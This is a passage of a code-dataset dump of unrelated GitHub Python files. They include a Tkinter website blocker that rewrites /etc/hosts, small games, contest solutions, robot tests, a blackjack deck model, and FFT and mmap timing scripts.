\"x\" + str(self.rootHeight))\n # Attach the logo here\n self.img = tkinter.PhotoImage(file=resource_path('favicon.gif'))\n self.parentWindow.tk.call('wm', 'iconphoto', self.parentWindow._w, self.img)\n \n \n def __clearParentWindowCanvas__(self):\n \"\"\"Method deletes all the child elements of the parentWindow node\"\"\"\n for child in self.parentWindow.winfo_children():\n try:\n child.destroy()\n except:\n pass\n # child.destroy()\n \n def __generateParentWindow__(self):\n \"\"\"Creates the root window\"\"\"\n self.__clearParentWindowCanvas__()\n self.__generateSlider__()\n self.__generateStartButton__()\n self.__generateViewButton__()\n # Check if /etc/.hosts.backup already exists. If it does, then copy it back to /etc/hosts. Otherwise, do nothing\n \n \n def __generateSlider__(self):\n \"\"\"Creates the slider present on the root window that enables time to be selected\"\"\"\n self.sliderLabel = tkinter.Label(self.parentWindow, text=\"Time (in hours)\")\n # self.sliderLabel.place(x = (self.rootWidth - self.sliderWidth)/2, y = 10, width=self.sliderWidth, height=self.sliderHeight)\n self.sliderLabel.pack()\n self.slider = tkinter.Scale(self.parentWindow, from_=0.5, to=24, length=self.sliderWidth, resolution=0.5, orient=\"horizontal\")\n # self.slider.grid(row=5, column=10)\n self.slider.set(0.5)\n # self.slider.pack()\n self.slider.place(x = (self.rootWidth - self.sliderWidth)/2, y = 20, width=self.sliderWidth, height=self.sliderHeight)\n\n def __generateStartButton__(self):\n \"\"\"Creates the start button on the root window that will start the block\"\"\"\n self.startButton = tkinter.Button(self.parentWindow, text =\"Start\", command = self.startButtonAction)\n # .grid(row=7, column=10)\n\n # self.startButton.pack(side=\"left\")\n self.startButton.place(x = (self.rootWidth - self.buttonWidth)/2 - 2 * self.buttonWidth, y = self.sliderHeight + self.buttonHeight, width=self.buttonWidth, height=self.buttonHeight)\n\n def __generateViewButton__(self):\n \"\"\"Creates the view button on the root window that will display a sub-window that lists all the blocked sites\"\"\"\n self.viewButton = tkinter.Button(self.parentWindow, text =\"View\", command = self.viewButtonAction)\n # .grid(row=7, column=18)\n # self.viewButton.pack(side=\"right\")\n self.viewButton.place(x = (self.rootWidth - self.buttonWidth)/2 + 2 * self.buttonWidth, y = self.sliderHeight + self.buttonHeight, width=self.buttonWidth, height=self.buttonHeight)\n\n def __generateEntryWidget__(self):\n \"\"\"Creates the entry widget in the view-list window\"\"\"\n self.entry = tkinter.Entry(self.viewListWindow)\n self.entry.pack()\n \n def __generateAddButton__(self):\n \"\"\"Creates the add button in the view-list window\"\"\"\n self.addButton = tkinter.Button(self.viewListWindow, text =\"Add\", command = self.addButtonAction)\n # .grid(row=7, column=10)\n\n # b.pack(side=\"left\")\n # self.addButton.place(x = (rootWidth - buttonWidth)/2 - 2 * buttonWidth, y = sliderHeight + buttonHeight, width=buttonWidth, height=buttonHeight)\n self.addButton.pack()\n self.viewListWindow.bind(\"\", self.__handleEnter__)\n \n def __handleEnter__(self, event):\n \"\"\"This method is called when the RETURN key is pressed on the viewListWindow\"\"\"\n self.addButtonAction()\n\n def __generateListBox__(self):\n \"\"\"Creates the listbox widget in the view-list window\"\"\"\n self.listBox = tkinter.Listbox(self.viewListWindow)\n self.__displayAllDomainsInListBox__()\n self.listBox.pack()\n \n def __generateListBoxContextMenu__(self):\n \"\"\"Creates the context menu for the listbox in the view-list window\"\"\"\n # Add a context menu here\n # create a popup menu\n self.listboxContextMenu = tkinter.Menu(self.viewListWindow, tearoff=0)\n self.listboxContextMenu.add_command(label=\"Delete\", command=self.deleteMenuAction)\n\n # create a canvas\n frame = tkinter.Frame(self.viewListWindow, width=512, height=512)\n frame.pack()\n\n def popup(event):\n # Check if selection has been made\n if event.widget.curselection() == ():\n return\n # Otherwise, don't display the menu\n self.listboxContextMenu.tk_popup(event.x_root, event.y_root)\n # attach popup to canvas\n self.listBox.bind(\"\", popup)\n \n def __generateViewSitesFrame__(self):\n \"\"\"Creates the sub-window that lists all the blocked sites\"\"\"\n self.viewListWindow = tkinter.Toplevel()\n self.viewListWindow.title(\"FocusApp - Sites list\")\n self.viewListWindow.geometry(str(self.rootWidth) + \"x\" + str(self.rootHeight))\n self.viewListWindow.tk.call('wm', 'iconphoto', self.viewListWindow._w, self.img)\n\n self.__generateEntryWidget__()\n self.__generateAddButton__()\n self.__generateListBox__()\n self.__generateListBoxContextMenu__()\n \n def __generateTimerWindow__(self):\n \"\"\"Creates a timer window that displays the time left before sites would be automatically unblocked\"\"\"\n self.__clearParentWindowCanvas__()\n\n # Add a label here\n self.timerWindowLabel = tkinter.Label(self.parentWindow, text=\"Hey\")\n self.timerWindowLabel.pack()\n # self.timerWindow.mainloop()\n \n def __displayAllDomainsInListBox__(self):\n \"\"\"Parses through the .domains.list file and loads all the domains into the listbox\"\"\"\n # Delete all the elements\n self.listBox.delete(0, tkinter.END)\n # Open the .domains.list file here and populate the entries\n if not pathlib.Path(resource_path(\".domains.list\")).is_file():\n # Create an .domains.list file here\n open(resource_path(\".domains.list\"), \"w\").close()\n # .domains.list exists here\n domainsFile = open(resource_path(\".domains.list\"), \"r\")\n domainsList = domainsFile.read().split(\"\\n\")\n i = 1\n for domain in domainsList:\n self.listBox.insert(i, domain)\n i += 1\n domainsFile.close()\n \n def __writeToHosts__(self):\n \"\"\"Method reads the .domains.list file and writes to /etc/hosts\"\"\"\n domainsList = open(resource_path(\".domains.list\"), \"r\").read().split(\"\\n\")\n hostsFile = \"\"\n for domain in domainsList:\n if domain == \"\":\n continue\n hostsFile += \"127.0.0.1 \" + domain + \"\\n\"\n hostsFile += \"::1 \" + domain + \"\\n\\n\"\n # print(\"Hosts file has become: \\n\\n\", hostsFile)\n # Read from \"/etc/.hosts.backup\"\n existingDNS = open(\"/etc/.hosts.backup\", \"r\").read()\n f = open(\"/etc/hosts\", \"w\")\n f.write(existingDNS)\n f.write(\"\\n\\n\")\n f.write(hostsFile)\n f.close()\n \n def start(self):\n \"\"\"Starts the GUI\"\"\"\n # Read the .stats file. \n if not pathlib.Path(resource_path(\".stats\")).is_file():\n # If no .stats file is present, start the mainloop.\n # print(\".stats file is not present\")\n self.__generateParentWindow__()\n else:\n # .stats file is present.\n # print(\"*****.stats file is present*****\")\n # Read the endtime\n endTime = 0\n try:\n endTime = int(open(resource_path(\".stats\"), \"r\").read())\n # print(\"End Time is \", endTime)\n except:\n endTime = 0\n # print(\"While fetching end time, error occurred, hence, setting end time to \", endTime)\n currentTime = time.time()\n if currentTime > endTime:\n # If cur_time > endtime, start the mainloop.\n # print(\"Current time is greater than endtime. Starting mainloop.\")\n self.__generateParentWindow__()\n else:\n # Otherwise, display a box with remaining time.\n # print(\"Sites are still blocked.\")\n self.initTimer(endTime - currentTime)\n self.parentWindow.mainloop()\n\n def initTimer(self, timeLeft):\n self.timeLeft = int(timeLeft)\n \"\"\"Method initialises a timer\"\"\"\n # Create a timer window here\n self.__generateTimerWindow__()\n self.startTimer()\n \n def startTimer(self):\n \"\"\"Method starts the timer\"\"\"\n if self.timeLeft == 0:\n # Delete contents from .stats\n open(resource_path(\".stats\"), \"w\").close()\n self.__clearParentWindowCanvas__()\n # Copy back /etc/.hosts.backup to /etc/hosts\n try:\n \n shutil.copy2(\"/etc/.hosts.backup\", \"/etc/hosts\")\n except Exception as e:\n # print(\"While copying /etc/.hosts.backup to /etc/hosts, error is \", e)\n pass\n reloadDNS()\n self.start()\n else:\n self.timeLeft -= 1\n self.timerWindowLabel.config(text=str(self.timeLeft))\n self.timerWindowLabel.after(1000, self.startTimer)\n \n def startButtonAction(self):\n \"\"\"Called when the start button is pressed\"\"\"\n # Ask for sudo permission\n # try:\n # subprocess.check_call([\"gksudo\", \"su\"])\n # except subprocess.CalledProcessError:\n # messagebox.showinfo(\"message\", \"OOOOPS...\\nWrong password!\")\n # return\n # else:\n # messagebox.showinfo(\"message\", \"Login successful!\")\n\n\n\n # Fetch the time in the slider\n timerVal = self.slider.get()\n # print(\"Timer value is \", timerVal)\n # Read all the sites in .domains.list. \n if not pathlib.Path(resource_path(\".domains.list\")).is_file():\n # Create an .domains.list file here\n open(resource_path(\".domains.list\"), \"w\").close()\n # Read all domains\n domainsFile = open(resource_path(\".domains.list\"), \"r\").read()\n if domainsFile == \"\":\n # If no .domains.list file is present, display a messagebox stating so.\n messagebox.showerror(\"FocusApp Error\", \"No domains added yet. Add them by clicking the View button.\")\n return\n \n # Make a backup of /etc/hosts to /etc/.hosts.backup\n try:\n open(\"/etc/.hosts.backup\", \"w\").close()\n shutil.copy2(\"/etc/hosts\", \"/etc/.hosts.backup\")\n except Exception as e:\n # print(\"While copying /etc/hosts to /etc/.hosts.backup, error is \", e)\n pass\n \n self.__writeToHosts__()\n\n reloadDNS()\n\n # Create a .stats file, with endtime\n curTime = int(time.time())\n endTime = curTime + int(timerVal * 3600)\n f = open(resource_path(\".stats\"), \"w\")\n f.write(str(endTime))\n f.close()\n # Call initTimer here\n self.initTimer(endTime - curTime)\n \n\n def viewButtonAction(self):\n \"\"\"Called when the view button is pressed. Will generate another window that will list all the sites that need to be blocked.\"\"\"\n self.__generateViewSitesFrame__()\n \n def addButtonAction(self):\n \"\"\"Called when the add button is clicked. This will add the value entered in the text field to the domains list.\"\"\"\n # Get the value in the entry widget\n domain = self.entry.get()\n if domain == \"\":\n return\n # Clear the value in the entry widget\n self.entry.delete(0, tkinter.END)\n if not pathlib.Path(resource_path(\".domains.list\")).is_file():\n # Create an .domains.list file here\n open(resource_path(\".domains.list\"), \"w\").close()\n # Read all domains\n domainsList = open(resource_path(\".domains.list\"), \"r\").read().split(\"\\n\")\n # Prepend to the list\n domainsList.insert(0, domain)\n # Write to the file\n domainsFile = open(resource_path(\".domains.list\"), \"w\")\n domainsFile.write(\"\\n\".join(domainsList))\n domainsFile.close()\n self.__displayAllDomainsInListBox__()\n\n def deleteMenuAction(self):\n \"\"\"Called when the delete context menu is clicked\"\"\"\n value = self.listBox.get(self.listBox.curselection()[0])\n if value == \"\":\n return\n # Read the file and store all the elements in a list\n domainsList = open(resource_path(\".domains.list\"), \"r\").read().split(\"\\n\")\n domainsList.remove(value)\n domainsFile = open(resource_path(\".domains.list\"), \"w\")\n domainsFile.write(\"\\n\".join(domainsList))\n domainsFile.close()\n self.__displayAllDomainsInListBox__()\n\n\ndef reloadDNS():\n \"\"\"Function that reloads the /etc/hosts file\"\"\"\n return\n\n\"\"\"\nTODO\n5. Use grid to restyle the app.\n9. Check how to ask for permission for sudo usage.\n11. Make the code portable to work on windows as well.\n12. Set after() time to 1000, from 1.\n\"\"\"","repo_name":"apratheek/FocusApp","sub_path":"focusapp.py","file_name":"focusapp.py","file_ext":"py","file_size_in_byte":14230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19462829536","text":"\"\"\"/*\n* Reto #18\n* TRES EN RAYA\n* Fecha publicaci贸n enunciado: 02/05/22\n* Fecha publicaci贸n resoluci贸n: 09/05/22\n* Dificultad: DIF脥CIL\n*\n* Enunciado: Crea una funci贸n que analice una matriz 3x3 compuesta por \"X\" y \"O\" y retorne lo siguiente:\n* - \"X\" si han ganado las \"X\"\n* - \"O\" si han ganado los \"O\"\n* - \"Empate\" si ha habido un empate\n* - \"Nulo\" si la proporci贸n de \"X\", de \"O\", o de la matriz no es correcta. O si han ganado los 2.\n* Nota: La matriz puede no estar totalmente cubierta. Se podr铆a representar con un vac铆o \"\", por ejemplo.\n*\n* Informaci贸n adicional:\n* - Usa el canal de nuestro discord (https://mouredev.com/discord) \"馃攣reto-semanal\" para preguntas, dudas o prestar ayuda a la comunidad.\n* - Puedes hacer un Fork del repo y una Pull Request al repo original para que veamos tu soluci贸n aportada.\n* - Revisar茅 el ejercicio en directo desde Twitch el lunes siguiente al de su publicaci贸n.\n* - Subir茅 una posible soluci贸n al ejercicio el lunes siguiente al de su publicaci贸n.\n*\n*/\"\"\"\n\nfrom enum import Enum\n\nclass Value(Enum):\n X = 'X'\n O = 'O'\n EMPTY = ''\nclass Triqui:\n combinations = [[1,2,3],[4,5,6],[7,8,9],[1,4,7],[2,5,8],[3,6,9],[1,5,9],[3,5,7]]\n def __init__(self,grid):\n self.grid = grid\n def check_triqui(self):\n result = 'Draw'\n play_x = []\n play_o = []\n x_count = 0\n o_count = 0\n if len(self.grid) != 3 :\n return \"Nulo\"\n else:\n b = 1\n for row in self.grid:\n if len(row) != 3 :\n return \"Nulo\"\n for box in row :\n if box == Value.X :\n play_x.append(b)\n x_count += 1\n elif box == Value.O :\n play_o.append(b)\n o_count += 1\n b += 1\n if abs(x_count - o_count) > 1:\n return \"Nulo\"\n for win in self.combinations:\n if len(set(win) & set(play_o)) == 3:\n if result == 'Draw' :\n result = Value.O.value\n else:\n return 'Nulo'\n elif len(set(win) & set(play_x)) == 3:\n if result == 'Draw':\n result = Value.X.value\n else :\n return \"Nulo\"\n return result if result == 'Draw' else f'Win {result}'\n \nif __name__ == \"__main__\":\n grid_1 = [[Value.X, Value.O, Value.X],[Value.O, Value.X, Value.O],[Value.O, Value.O, Value.X]]\n grid_2 = [[Value.EMPTY, Value.O, Value.X],[Value.EMPTY, Value.X, Value.O],[Value.EMPTY, Value.O, Value.X]]\n grid_3 = [[Value.O, Value.O, Value.EMPTY],[Value.O, Value.X, Value.X],[Value.O, Value.X, Value.X]]\n grid_4 = [[Value.X, Value.O, Value.X],[Value.X, Value.X, Value.O],[Value.X, Value.X, Value.X]]\n triqui_1 = Triqui(grid_1)\n triqui_2 = Triqui(grid_2)\n triqui_3 = Triqui(grid_3)\n triqui_4 = Triqui(grid_4)\n print(triqui_1.check_triqui()) \n print(triqui_2.check_triqui())\n print(triqui_3.check_triqui())\n print(triqui_4.check_triqui()) \n","repo_name":"JulianD1997/Retos-de-programacion","sub_path":"reto18.py","file_name":"reto18.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5411076536","text":"\"\"\"\r\nGuessing Game\r\nDescription: This program is a simple guessing game with three different difficulties\r\nAuthor: Pedro Torres\r\n\"\"\"\r\nfrom random import *\r\n\r\n# Guessing Game 2.0\r\n\r\n# Makes sure that the user enters a valid difficulty\r\noptions = [\"Easy\", \"Medium\", \"Hard\"]\r\nwhile True:\r\n game_difficulty = input(\"Select a difficulty [Easy][Medium][Hard]: \")\r\n print(\"\")\r\n game_difficulty = game_difficulty.capitalize()\r\n\r\n if game_difficulty in options:\r\n break\r\n else:\r\n # These are the exceptions\r\n if game_difficulty.isdigit():\r\n print(\"Enter a word not a number.\")\r\n print(\"\")\r\n else:\r\n print(\"Sorry, but that is not a valid difficulty.\")\r\n print(\"\")\r\n\r\nguesses = 0\r\nrandom_number = 0\r\nguessing_range = 0\r\nif game_difficulty == \"Easy\":\r\n guessing_range = 100\r\n guesses = 15\r\n random_number = randint(1, guessing_range)\r\nelif game_difficulty == \"Medium\":\r\n guessing_range = 300\r\n guesses = 10\r\n random_number = randint(1, guessing_range)\r\nelif game_difficulty == \"Hard\":\r\n guessing_range = 500\r\n guesses = 5\r\n random_number = randint(1, guessing_range)\r\n\r\nprint(\"You have chosen \" + game_difficulty + \" mode.\")\r\nprint(str(guesses) + \" guesses\" + \".\")\r\nprint(\"The random number lies between 1 and \" + str(guessing_range) + \".\")\r\nprint(\"\\n\")\r\n\r\n# Starts the game\r\ni = guesses\r\nwhile i > 0:\r\n while True:\r\n try:\r\n print(\"\")\r\n guess = int(input(\"Take your shot: \"))\r\n break\r\n except ValueError:\r\n print(\"That input is invalid! Try something else.\")\r\n if guess == random_number:\r\n print(\"You won!\")\r\n break\r\n elif guess > guessing_range or guess < 0:\r\n print(\"You guess is out of range!\")\r\n\r\n elif guess < random_number:\r\n i = i - 1\r\n print(\"You have guessed too low.\")\r\n\r\n elif guess > random_number:\r\n i = i - 1\r\n print(\"You have guessed too high.\")\r\n\r\n print(str(i) + \" guesses left.\")\r\n\r\nif i > 0:\r\n print(\"You won!\")\r\nelse:\r\n print(\"Wow, I guess you lost. Try again.\")\r\n","repo_name":"pedrot123/HS-Comp-Sci-Projects","sub_path":"Intro to Comp Sci/Guessing Game.py","file_name":"Guessing Game.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23412144961","text":"__author__ = 'Bill'\r\n\r\nimport sys, time\r\n\r\ndef parse_case(file):\r\n a1 = int(file.readline()) - 1\r\n cards1 = []\r\n for i in range(4):\r\n cards1.append( map(int, file.readline().split()) )\r\n a2 = int(file.readline()) - 1\r\n cards2 = []\r\n for i in range(4):\r\n cards2.append( map(int, file.readline().split()) )\r\n\r\n return a1, cards1, a2, cards2\r\n\r\ndef process_case(case):\r\n a1, cards1, a2, cards2 = case\r\n #print(cards1[a1], cards2[a2])\r\n\r\n result_set = set(cards1[a1]) & set(cards2[a2])\r\n if len(result_set) == 1:\r\n result = result_set.pop()\r\n elif len(result_set) > 1:\r\n result = 'Bad magician!'\r\n else:\r\n result = 'Volunteer cheated!'\r\n\r\n return result\r\n\r\nif __name__ == '__main__':\r\n t0 = time.clock()\r\n\r\n if len(sys.argv) > 1:\r\n filename = sys.argv[1]\r\n else:\r\n filename = \"sample.in\"\r\n\r\n input_file = open(filename, \"r\")\r\n output_file = open(filename.replace('in','out'), \"w\")\r\n case_count = int(input_file.readline())\r\n for i in range(case_count):\r\n result = process_case(parse_case(input_file))\r\n output_line = 'Case #%d: %s\\n' % (i+1, result)\r\n print(output_line)\r\n output_file.writelines(output_line)\r\n\r\n input_file.close()\r\n output_file.close()\r\n\r\n print('Total Time: %s' % str(time.clock() - t0))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/1896.py","file_name":"1896.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42598274068","text":"#!/usr/bin/python3\n\n\nimport cozmo\n\nfrom chifoumi import RoundResult\nimport robotchifoumi\nfrom robotchifoumi import RobotChifoumi\n\n\ndef testGameEnd(r: cozmo.robot.Robot):\n robot = RobotChifoumi(r)\n\n robot.react_to_game_end(5, 3)\n robot.react_to_game_end(0, 3)\n robot.react_to_game_end(1, 3)\n robot.react_to_game_end(2, 3)\n robot.react_to_game_end(3, 0)\n robot.react_to_game_end(3, 2)\n\ndef testRoundEnd(r: cozmo.robot.Robot):\n robot = RobotChifoumi(r)\n\n robot.react_to_round_end(RoundResult.PLAYER1_WIN)\n robot.react_to_round_end(RoundResult.PLAYER1_WIN)\n robot.react_to_round_end(RoundResult.PLAYER1_WIN)\n robot.react_to_round_end(RoundResult.PLAYER1_WIN)\n robot.react_to_round_end(RoundResult.PLAYER1_WIN)\n\n robot.react_to_round_end(RoundResult.PLAYER2_WIN)\n robot.react_to_round_end(RoundResult.PLAYER2_WIN)\n robot.react_to_round_end(RoundResult.PLAYER2_WIN)\n robot.react_to_round_end(RoundResult.PLAYER2_WIN)\n robot.react_to_round_end(RoundResult.PLAYER2_WIN)\n robot.react_to_round_end(RoundResult.PLAYER2_WIN)\n\n robot.react_to_round_end(RoundResult.DRAW)\n robot.react_to_round_end(RoundResult.PLAYER2_WIN)\ndef testConnectToLightCubes(robot):\n robot.world.connect_to_cubes()\n robot.world.auto_disconnect_from_cubes_at_end()\n\n for c in robot.world.connected_light_cubes:\n print(c)\n\n\ndef testImages(robot: cozmo.robot.Robot):\n robot_cozmo = robotchifoumi.RobotChifoumi(robot)\n\n #for image in robot_cozmo.images:\n # robot_cozmo.robot.display_oled_face_image(image.value, 200).wait_for_completed()\n\n robot_cozmo.robot.display_oled_face_image(robot_cozmo.images[chifoumi.Coup.ROCK], 5000).wait_for_completed()\n robot_cozmo.robot.display_oled_face_image(robot_cozmo.images[chifoumi.Coup.PAPER], 5000).wait_for_completed()\n robot_cozmo.robot.display_oled_face_image(robot_cozmo.images[chifoumi.Coup.SCISSORS], 5000).wait_for_completed()\n\n\ncozmo.run_program(testRoundEnd)\n","repo_name":"Phignis/Cozmo3Coups","sub_path":"Cozmo3Coups/src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41878534849","text":"class Solution:\n def simplifyPath(self, path: str) -> str:\n \n i, n, word, stack = 1, len(path), '', []\n while i bool:\n return self.rank == other_card.rank\n \n \n\n\nclass InvalidCard(Exception):\n pass\n\n\nclass Hand:\n \n #Create hand (most likely to 0 cards, before adding)\n def __init__(self, num_of_cards, cards: list):\n self.num_of_cards = num_of_cards\n self.cards = cards\n self.split = False\n\n\n #Add card to hand\n def add_card(self, card):\n self.cards.append(card)\n self.num_of_cards += 1\n\n def remove_card(self, index):\n self.cards.remove(index)\n self.num_of_cards -= 1\n\n #Get value of hand:\n def get_hValue(self) -> tuple:\n total1 = 0\n total2 = 0\n for card in self.cards:\n if card.value == 11: #card is an ace\n total1 += 1\n total2 += 11\n else:\n total1 += card.value\n total2 += card.value\n \n return (total1, total2)\n \n def __str__(self):\n \n #Hand:\n cards_str = '['\n for card in self.cards:\n cards_str += str(card)\n if card != self.cards[len(self.cards) -1]:\n cards_str += ', '\n else:\n cards_str += ']'\n\n #Hand Value:\n val_str = ''\n totals = self.get_hValue()\n\n #No ace in hand, or ace = 1 because total2>21:\n if totals[1] == totals[0] or totals[1] > 21:\n val_str += str(totals[0])\n\n else: \n val_str += str(totals[1]) + '/' + str(totals[0])\n \n \n\n return (cards_str + ' = ' + val_str)\n \n def has_ace(self):\n return '/' in self.__str__()\n \n \nclass Deck:\n\n def __init__(self):\n self.cards = self.generate_deck()\n self.num_of_cards = 52\n \n\n def generate_deck(self):\n cards = []\n\n #iterate through suit and rank\n for s in range(0,4):\n for r in range(0,13):\n card = Card(SUITS[s], RANKS[r])\n cards.append(card)\n \n shuffle(cards)\n return cards\n \n \n\nclass Shoe:\n\n def __init__(self, num_of_decks):\n self.num_of_decks = num_of_decks\n self.decks = self.generate_shoe()\n \n \n def generate_shoe(self):\n shoe = []\n for i in range(self.num_of_decks):\n deck = Deck()\n shoe.append(deck)\n\n shuffle(shoe)\n return shoe\n \n\n def distribute_card(self):\n #Returns first card in shoe, if exists\n\n #Check num of decks != 0:\n if (self.num_of_decks == 0):\n print(\"Empty shoe.\")\n return\n \n #Check length of deck:\n for deck in self.decks:\n if len(deck.cards) == 0:\n self.decks.remove(deck)\n self.num_of_decks -= 1\n\n #New Card:\n card = self.decks[0].cards.pop(0)\n self.decks[0].num_of_cards -= 1\n \n return card\n\n\n\ndef display_deck():\n '''\n for suit in SUITS:\n for rank in RANKS:\n card = Card(suit, rank)\n print(card, card.value)\n '''\n \n deck = Deck()\n for card in deck.cards:\n print(card)\n\n#display_deck()\n\ndef display_shoe():\n shoe = Shoe(1)\n\n for deck in shoe.decks:\n for card in deck:\n print(card)\n\n#display_shoe()\n\n'''\ndef display_hand():\n deck = Deck()\n hand = Hand(2, [deck.cards[0], deck.cards[1]])\n print(hand)\n hand.add_card(deck.cards[2])\n print(hand)\n\n#display_hand()\n'''","repo_name":"Chris-Smith22/blackjack-repo","sub_path":"src/deck.py","file_name":"deck.py","file_ext":"py","file_size_in_byte":4387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15608514144","text":"# Задание №4\n# 🐀 Создать программу, которая будет производить подсчет\n# количества слов в каждом файле в указанной директории и\n# выводить результаты в консоль.\n# 🐀 Используйте потоки.\n\nimport threading\nimport time\nimport os\n\nPATH = 'parser_url'\ncount = 0\n\n\nasync def count_words(filename: str) -> None:\n global count\n with open(filename, encoding='utf-8') as f:\n count += len(f.read().split())\n\n\nif __name__ == '__main__':\n threads = []\n start_time = time.time()\n\n for root, dirs, files in os.walk(PATH):\n for filename in files:\n file_path = os.path.join(root, filename)\n thread = threading.Thread(target=count_words, args=(file_path,))\n threads.append(thread)\n thread.start()\n\n for thread in threads:\n thread.join()\n\n print(f'Amount of words is: {count}')\n","repo_name":"Valzhana/Flask","sub_path":"Practice/Practice_sem4/task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39575488784","text":"from __future__ import annotations\n\nfrom typing import Union\n\nimport attrs\nimport torch\n\nfrom .. import DataProcessor, IndexProcessor, JointIndexDataProcessor, Layer\nfrom . import (\n UserVolumetricIndex,\n VolumetricBackend,\n VolumetricFrontend,\n VolumetricIndex,\n)\n\nVolumetricDataProcT = Union[\n DataProcessor[torch.Tensor], JointIndexDataProcessor[torch.Tensor, VolumetricIndex]\n]\n\n\n@attrs.frozen\nclass VolumetricLayer(Layer[VolumetricIndex, torch.Tensor]):\n backend: VolumetricBackend[torch.Tensor]\n frontend: VolumetricFrontend\n readonly: bool = False\n\n index_procs: tuple[IndexProcessor[VolumetricIndex], ...] = ()\n read_procs: tuple[VolumetricDataProcT, ...] = ()\n write_procs: tuple[VolumetricDataProcT, ...] = ()\n\n def __getitem__(self, idx: UserVolumetricIndex) -> torch.Tensor:\n idx_backend = self.frontend.convert_idx(idx)\n return self.read_with_procs(idx=idx_backend)\n\n def __setitem__(self, idx: UserVolumetricIndex, data: torch.Tensor | float | int | bool):\n idx_backend, data_backend = self.frontend.convert_write(idx, data)\n self.write_with_procs(idx=idx_backend, data=data_backend)\n\n def pformat(self) -> str: # pragma: no cover\n return self.backend.pformat()\n\n def with_changes(\n self,\n **kwargs,\n ):\n return attrs.evolve(self, **kwargs) # pragma: no cover\n","repo_name":"ZettaAI/zetta_utils","sub_path":"zetta_utils/layer/volumetric/layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"26023161055","text":"import numpy as np # math operations\nimport time\nfrom dft import dft\n\nn = 10 # harmonics\nw = 2700 #frequency\nN = 256 # discrete calls\n\ndef signalsGenerator(n,w,N):\n signals = np.zeros(N)\n W = w / n\n for _ in range(n):\n for t in range(N):\n amplitude = np.random.rand()\n phase = np.random.rand()\n signals[t] += (amplitude * np.sin(W * t + phase))\n W += W\n return signals\n\n\ndef fCoeff(k, N):\n exp = 2.0 * np.pi * k / N\n return complex(np.cos(exp), -np.sin(exp))\n\n\n# Fast Fourier Transform\ndef ffTransform(signals):\n N = len(signals)\n if N == 1 :\n return signals\n spectrum = [0] * N\n\n evens = ffTransform(signals[::2])\n odds = ffTransform(signals[1::2])\n\n l = int(N/2)\n for k in range(l):\n exp = odds[k] * fCoeff(k, N)\n\n spectrum[k] = evens[k] + exp\n spectrum[k + l] = evens[k] - exp\n\n return spectrum\n\n\nsigs = signalsGenerator(n, w, N)\n\nstart = time.time()\ndft(sigs)\nprint(\"discrete Fourier transform time: {}\".format(time.time() - start))\n\n\nstart = time.time()\nffTransform(sigs)\nprint(\"fast Fourier transform time: {}\".format(time.time() - start))\n\n\n","repo_name":"St3r16/rts","sub_path":"2.2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22005110873","text":"import sys; sys.stdin = open(\"14490.txt\", \"r\")\n\nn, m = input().split(':')\n\nnumM = int(m)\nnumN = int(n)\n\nwhile numM:\n numN, numM = numM, numN % numM\n\nprint(\"{}:{}\".format(int(n) // numN, int(m) // numN))\n","repo_name":"vreez/APS","sub_path":"boj/boj_14490_백대열.py","file_name":"boj_14490_백대열.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16888531752","text":"\"\"\"\r\nA program that creates a sixteen-megabyte data file in two different ways, and\r\ntimes each method.\r\n\r\nThe first technique creates a memory-mapped file and writes the data by setting\r\none chunk at a time using successively higher indexes.\r\n\r\nThe second technique creates an empty binary file and repeatedly uses the write()\r\nmethod to write a chunk of data.\r\n\r\nFinally it shows how the timings vary with the size of the chunk.\r\n\r\nNB: file size chosen as a power of 2 (in this case to produce a file over \r\nten-megabyte) to allow for a simple chunk size progression (avoiding fractions\r\nand rounding) from 1 byte to half the desired file size. Conveniently, the sum\r\nof all the chunks in this progression equal the file size - 1. \r\n\"\"\"\r\nimport os\r\nimport mmap\r\nfrom time import clock\r\n\r\nFILENAME = \"bin_tempfile\"\r\nPOWER = 24\r\nFILESIZE = 2**POWER # 16MB\r\n# Chunk sizes double each time\r\nCHUNK_SIZES = [2**i for i in range(POWER)]\r\nnon_mmap_write_timings = []\r\nmmap_write_timings = []\r\n\r\ndef mmap_write():\r\n with open(FILENAME, \"w+b\") as f:\r\n mapf = mmap.mmap(f.fileno(), FILESIZE, access=mmap.ACCESS_WRITE, offset=0)\r\n offset = 0\r\n for chunk_size in CHUNK_SIZES:\r\n chunk = chunk_size * b\"*\"\r\n # time only the write of the chunk in CPU seconds\r\n time_start = clock()\r\n mapf[offset:offset+chunk_size] = chunk\r\n mapf.flush() # significantly improves performance\r\n time_stop = clock()\r\n offset += chunk_size\r\n mmap_write_timings.append(time_stop - time_start)\r\n \r\ndef non_mmap_write():\r\n with open(FILENAME, \"w+b\") as f:\r\n for chunk_size in CHUNK_SIZES:\r\n chunk = chunk_size * b\"*\"\r\n # time only the write of the chunk in CPU seconds\r\n time_start = clock()\r\n f.write(chunk)\r\n time_stop = clock()\r\n non_mmap_write_timings.append(time_stop - time_start)\r\n\r\nif __name__ == \"__main__\":\r\n mmap_write()\r\n print(\" mmap file of {0} bytes created\".format(os.path.getsize(\"bin_tempfile\")))\r\n non_mmap_write()\r\n 